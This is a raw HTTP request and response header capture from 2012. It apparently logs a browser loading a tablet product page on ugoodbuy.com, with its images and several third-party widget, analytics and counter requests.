Last-Modified: Thu, 18 Oct 2012 22:50:09 GMT
Connection: keep-alive
GET /includes/templates/slucky/images/add-wishlist-icon.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:07:11 GMT
Etag: &quot;9a5cf06-4c8-4c251e11175c0&quot;
Accept-Ranges: bytes
Content-Length: 1224
Keep-Alive: timeout=10, max=18
Connection: Keep-Alive
GET /feed/xml.php?412585089&uid=99 HTTP/1.1

Host: click.rndtrg.com
GET /feed/xml.php?412585089&amp;uid=99 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://click.rndtrg.com/feed/frames.php?uid=99&amp;frames=2
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Server: nginx
Date: Tue, 06 Nov 2012 22:12:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.16-1~dotdeb.0
Cache-Control: no-store, no-cache, must-revalidate
Content-Encoding: gzip
GET /includes/templates/slucky/images/theme-1/star01.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:02:45 GMT
Etag: &quot;9a5cba9-218-4c251d1369f40&quot;
Accept-Ranges: bytes
Content-Length: 536
Keep-Alive: timeout=10, max=17
Connection: Keep-Alive
GET /includes/templates/slucky/images/theme-1/tabs_price.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:02:48 GMT
Etag: &quot;9a5cbb0-3e6-4c251d1646600&quot;
Accept-Ranges: bytes
Content-Length: 998
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
GET /includes/templates/slucky/images/car3.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_sheets.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:08:14 GMT
Etag: &quot;9a5cfd2-1bc2-4c251e4db4df5&quot;
Accept-Ranges: bytes
Content-Length: 7106
Keep-Alive: timeout=10, max=22
Connection: Keep-Alive
GET /includes/templates/slucky/images/icon_dollar.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:10:02 GMT
Etag: &quot;9a5d0e6-24b-4c251eb42b680&quot;
Accept-Ranges: bytes
Content-Length: 587
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=17
Connection: Keep-Alive
GET /feed/xml.php?1851030069&uid=99 HTTP/1.1

Host: click.rndtrg.com
GET /feed/xml.php?1851030069&amp;uid=99 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://click.rndtrg.com/feed/frames.php?uid=99&amp;frames=2
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Server: nginx
Date: Tue, 06 Nov 2012 22:12:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.16-1~dotdeb.0
Cache-Control: no-store, no-cache, must-revalidate
Content-Encoding: gzip
GET /includes/templates/slucky/images/report_errors.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:11:53 GMT
Etag: &quot;9a5d23b-176-4c251f1eeee0f&quot;
Accept-Ranges: bytes
Content-Length: 374
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=16
Connection: Keep-Alive
GET /resource_73404/dev_v2/base-images/button-bg.jpg HTTP/1.1

Host: cloud.lbox.me

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_en_default.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Tengine/1.2.3
Content-Length: 1996
Accept-Ranges: bytes
Last-Modified: Wed, 22 Aug 2012 10:00:00 GMT
Cache-Control: public, max-age=24898339
Date: Tue, 06 Nov 2012 22:12:20 GMT
Connection: keep-alive
GET /includes/templates/slucky/images/15q-1.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_news_add.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:07:10 GMT
Etag: &quot;9a5cf01-2548-4c251e1023380&quot;
Accept-Ranges: bytes
Content-Length: 9544
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=18
Connection: Keep-Alive
GET /includes/templates/slucky/images/car88.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_sheets.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:08:15 GMT
Etag: &quot;9a5cfd7-91c-4c251e4ee938d&quot;
Accept-Ranges: bytes
Content-Length: 2332
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=21
Connection: Keep-Alive
GET /static/r07/sh103.html HTTP/1.1

Host: ct5.addthis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, no-check, max-age=86313600
Date: Tue, 06 Nov 2012 22:12:20 GMT
Last-Modified: Thu, 01 Nov 2012 12:00:06 GMT
P3P: CP=&quot;NON ADM OUR DEV IND COM STA&quot;
Server: ECS (arn/46FE)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 19180
GET /includes/templates/slucky/images/15q-02.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_en_default.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:07:08 GMT
Etag: &quot;9a5cefc-2384-4c251e0e3af00&quot;
Accept-Ranges: bytes
Content-Length: 9092
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=16
Connection: Keep-Alive
GET /static/r07/counter005.js HTTP/1.1

Host: ct5.addthis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, no-check, max-age=86313600
Date: Tue, 06 Nov 2012 22:12:20 GMT
Last-Modified: Thu, 01 Nov 2012 11:58:15 GMT
Server: ECS (arn/46E4)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 3311
GET /static/r07/counter006.css HTTP/1.1

Host: ct5.addthis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Cache-Control: public, no-check, max-age=86313600
Date: Tue, 06 Nov 2012 22:12:20 GMT
Last-Modified: Thu, 01 Nov 2012 11:58:14 GMT
Server: ECS (arn/46F3)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 5020
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Etag: &quot;9717c3c907d253191939bf5928941e07&quot;
Expires: Tue, 06 Nov 2012 22:12:20 GMT
Date: Tue, 06 Nov 2012 22:12:20 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /widgets.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:09 GMT
Etag: &quot;eeaccca8778f3be533564253af185e3e&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 24565
Date: Tue, 06 Nov 2012 22:12:20 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /images/share-connect.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2012 10:31:27 GMT
Etag: &quot;9a594b6-14ff-4c371b7aafdc0&quot;
Accept-Ranges: bytes
Content-Length: 5375
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=17
Connection: Keep-Alive
GET /images/l/SGDATIF001/UGB_1204171_1.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Tue, 03 Jul 2012 10:16:17 GMT
Etag: &quot;9a69924-3265-4c3ea347dff0e&quot;
Accept-Ranges: bytes
Content-Length: 12901
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
GET /plugins/like.php?href=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?href=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=arial&amp;layout=button_count HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: ko9wvoNjji+jkr5mYipXl/DEveFaYggUJFilmHQK5dg=
Date: Tue, 06 Nov 2012 22:12:21 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /images/pay.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Thu, 26 Jul 2012 08:01:38 GMT
Etag: &quot;9a59412-510f-4c5b701479c80&quot;
Accept-Ranges: bytes
Content-Length: 20751
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=22
Connection: Keep-Alive
GET /icon_12.gif HTTP/1.1

Host: icon.ajiang.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: max-age=14400
Content-Length: 822
Last-Modified: Fri, 26 May 2006 14:20:42 GMT
Accept-Ranges: bytes
Etag: &quot;0d9d691cf80c61:be3&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Nov 2012 22:12:20 GMT
Connection: close
GET /includes/templates/slucky/images/theme-1/blue_head_bg.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_sheets.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:21 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:00:59 GMT
Etag: &quot;9a5ca51-64-4c251cae530c0&quot;
Accept-Ranges: bytes
Content-Length: 100
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /live/t00/250lo.gif?69ffqy&uid=50998b44eb6f8d42&pub=ra-4d6f11bb277b1e73&rev=117843&jsl=33&si=50998b43cd85c0cf&ln=en&pc=men%2Ctbx&dp=www.ugoodbuy.com&of=0&uf=1&irt=0&md=2&ct=1&tct=0&abt=0&lt=195&cdn=5&tl=c%3D359%2Cm%3D997%2Ci%3D1002%2Cxm%3D1189%2Cxp%3D1195&pi=1&fp=cube-u18gt-elite_g3201.html HTTP/1.1

Host: m.addthisedge.com
GET /live/t00/250lo.gif?69ffqy&amp;uid=50998b44eb6f8d42&amp;pub=ra-4d6f11bb277b1e73&amp;rev=117843&amp;jsl=33&amp;si=50998b43cd85c0cf&amp;ln=en&amp;pc=men%2Ctbx&amp;dp=www.ugoodbuy.com&amp;of=0&amp;uf=1&amp;irt=0&amp;md=2&amp;ct=1&amp;tct=0&amp;abt=0&amp;lt=195&amp;cdn=5&amp;tl=c%3D359%2Cm%3D997%2Ci%3D1002%2Cxm%3D1189%2Cxp%3D1195&amp;pi=1&amp;fp=cube-u18gt-elite_g3201.html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ct5.addthis.com/static/r07/sh103.html
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Content-Length: 37
Date: Tue, 06 Nov 2012 22:12:15 GMT
Connection: close
GET /count/drjj/bg_FFFFFF/txt_000000/border_CCCCCC/columns_2/maxflags_12/viewers_NoLinks/labels_0/pageviews_0/flags_0/ HTTP/1.1

Host: s11.flagcounter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://click.rndtrg.com/feed/xml.php?412585089&amp;uid=99
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
GET /go.asp?svid=13&id=9642476&tpages=1&ttimes=1&tzone=1&tcolor=24&sSize=1176,885&referrer=&vpage=http%3A//www.ugoodbuy.com/cube-u18gt-elite_g3201.html HTTP/1.1

Host: web1.51.la:82
GET /go.asp?svid=13&amp;id=9642476&amp;tpages=1&amp;ttimes=1&amp;tzone=1&amp;tcolor=24&amp;sSize=1176,885&amp;referrer=&amp;vpage=http%3A//www.ugoodbuy.com/cube-u18gt-elite_g3201.html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/html
Date: Tue, 06 Nov 2012 22:12:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 0
Expires: Tue, 06 Nov 2012 05:32:22 GMT
Cache-Control: private
GET /red/p.json?vr=250&rev=117843&rb=0&gen=1000&gen=100&sid=50998b43cd85c0cf&callback=_ate.ad.hrr&pub=ra-4d6f11bb277b1e73&chr=UTF-8&mk=Cube%20U18GT%20Elite%207%27%27%20Android%204.0%20Tablet%20Rockchip%202918%201.2GHz%201024x600%205-Point%20Capacitive%20Screen%20with%20Camera%20HDMI%20USB%203G%20%5B1204171%5D%20Tablet%20PCs%20Cell%20Phones%20Kitchen%20%26%20Dining%2CDSLR%20Camera%20Accessories&uid=50998b44eb6f8d42&url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&ugohb5 HTTP/1.1

Host: cf.addthis.com
GET /red/p.json?vr=250&amp;rev=117843&amp;rb=0&amp;gen=1000&amp;gen=100&amp;sid=50998b43cd85c0cf&amp;callback=_ate.ad.hrr&amp;pub=ra-4d6f11bb277b1e73&amp;chr=UTF-8&amp;mk=Cube%20U18GT%20Elite%207%27%27%20Android%204.0%20Tablet%20Rockchip%202918%201.2GHz%201024x600%205-Point%20Capacitive%20Screen%20with%20Camera%20HDMI%20USB%203G%20%5B1204171%5D%20Tablet%20PCs%20Cell%20Phones%20Kitchen%20%26%20Dining%2CDSLR%20Camera%20Accessories&amp;uid=50998b44eb6f8d42&amp;url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;ugohb5 HTTP/1.1

